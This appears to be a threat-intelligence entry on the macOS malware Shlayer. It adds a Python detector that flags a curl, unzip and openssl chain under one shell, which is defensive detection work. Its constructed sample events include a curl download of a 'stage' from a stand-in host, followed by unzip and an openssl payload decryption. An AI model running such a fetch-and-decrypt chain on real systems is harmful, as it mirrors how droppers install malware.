
Shlayer is a macOS malware family associated with ad fraud activity through the distribution of adware applications. The trojan masquerades as an installer for applications such as Adobe Flash Player and executes numerous macOS commands to deobfuscate code and install adware with persistence mechanisms. Shlayer commonly delivers payloads such as AdLoad and Bundlore. In August 2020, Objective-See reported that Shlayer was the first malicious code to be notarized by Apple, which meant that macOS Gatekeeper, in its default configuration, allowed it to execute.

Shlayer and Bundlore are similar, but they have slightly different download, execution, and deobfuscation patterns that all involve curl, unzip, and openssl with particular command lines. Because Bundlore is frequently delivered as a second-stage payload of Shlayer, public reporting overlaps: some teams track certain TTPs under Bundlore while others track the same activity under Shlayer.
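The curl, unzip, and openssl chain described above is a natural detection anchor. The following is an added example, not code from the original page or from any vendor's detection content: it groups process-start events by the nearest shell ancestor and flags a shell whose children include all three binaries within a short window. The event tuple format, the sample events, the command lines, the `example.invalid` URLs, and the function names are all constructed for this example and are not reported Shlayer indicators.

```python
"""Heuristic detector for a curl -> unzip -> openssl chain under one shell.

Added example; event format and sample data are constructed, not real telemetry.
"""
import os
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-start events: (timestamp, pid, ppid, image, cmdline).
SAMPLE_EVENTS = [
    # Constructed suspicious chain: a script launched from a mounted disk image
    ("2020-08-30T10:00:01", 501, 480, "/bin/sh",
     "sh /Volumes/Install/Install.app/Contents/MacOS/Install"),
    ("2020-08-30T10:00:02", 502, 501, "/usr/bin/curl",
     "curl -fsL http://example.invalid/stage -o /tmp/stage.zip"),
    ("2020-08-30T10:00:03", 503, 501, "/usr/bin/unzip",
     "unzip -o /tmp/stage.zip -d /tmp/stage"),
    ("2020-08-30T10:00:04", 504, 501, "/usr/bin/openssl",
     "openssl enc -d -aes-256-cbc -in /tmp/stage/blob -out /tmp/stage/run -pass pass:x"),
    # Constructed benign session: a developer fetching and unpacking an SDK, no openssl
    ("2020-08-30T11:00:00", 601, 590, "/bin/zsh", "-zsh"),
    ("2020-08-30T11:00:05", 602, 601, "/usr/bin/curl",
     "curl -fsL https://example.invalid/sdk.zip -o sdk.zip"),
    ("2020-08-30T11:00:20", 603, 601, "/usr/bin/unzip", "unzip sdk.zip"),
    # Constructed benign session: openssl used to inspect a certificate, no curl/unzip
    ("2020-08-30T12:00:00", 701, 690, "/bin/bash", "-bash"),
    ("2020-08-30T12:00:01", 702, 701, "/usr/bin/openssl",
     "openssl x509 -in cert.pem -noout -text"),
]

SHELLS = {"sh", "bash", "zsh"}
CHAIN = {"curl", "unzip", "openssl"}


def parse_events(events):
    """Normalise raw tuples into dicts keyed by the binary's base name."""
    return [
        {"ts": datetime.fromisoformat(ts), "pid": pid, "ppid": ppid,
         "name": os.path.basename(image), "cmd": cmd}
        for ts, pid, ppid, image, cmd in events
    ]


def nearest_shell_ancestor(proc, by_pid):
    """Walk the parent chain until a shell is found; return its pid or None."""
    cur = by_pid.get(proc["ppid"])
    while cur is not None:
        if cur["name"] in SHELLS:
            return cur["pid"]
        cur = by_pid.get(cur["ppid"])
    return None


def find_chains(events, window=timedelta(seconds=60)):
    """Return one hit per shell whose descendants ran curl, unzip and openssl
    within `window`. The window and the shell-anchoring are assumptions chosen
    for this example; tune both to your own telemetry."""
    procs = parse_events(events)
    by_pid = {p["pid"]: p for p in procs}
    groups = defaultdict(list)
    for p in procs:
        if p["name"] in CHAIN:
            anchor = nearest_shell_ancestor(p, by_pid)
            if anchor is not None:
                groups[anchor].append(p)

    hits = []
    for anchor, children in groups.items():
        children.sort(key=lambda c: c["ts"])
        seen = {c["name"] for c in children}
        # Require all three binaries and a first-to-last span inside the window.
        if CHAIN <= seen and children[-1]["ts"] - children[0]["ts"] <= window:
            hits.append({
                "shell_pid": anchor,
                "script": by_pid[anchor]["cmd"],
                "cmdlines": [c["cmd"] for c in children],
            })
    return hits


if __name__ == "__main__":
    for hit in find_chains(SAMPLE_EVENTS):
        print(f"shell pid {hit['shell_pid']} ran: {hit['script']}")
        for line in hit["cmdlines"]:
            print("   ", line)
```

Only the first session is flagged: the developer session lacks openssl, and the certificate check lacks curl and unzip. Anchoring on the shell rather than on the individual binaries is what separates the chain from ordinary admin use of the same tools; a production rule would add the specific command-line arguments seen in your own Shlayer or Bundlore samples and would use a sliding window rather than a single first-to-last span.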
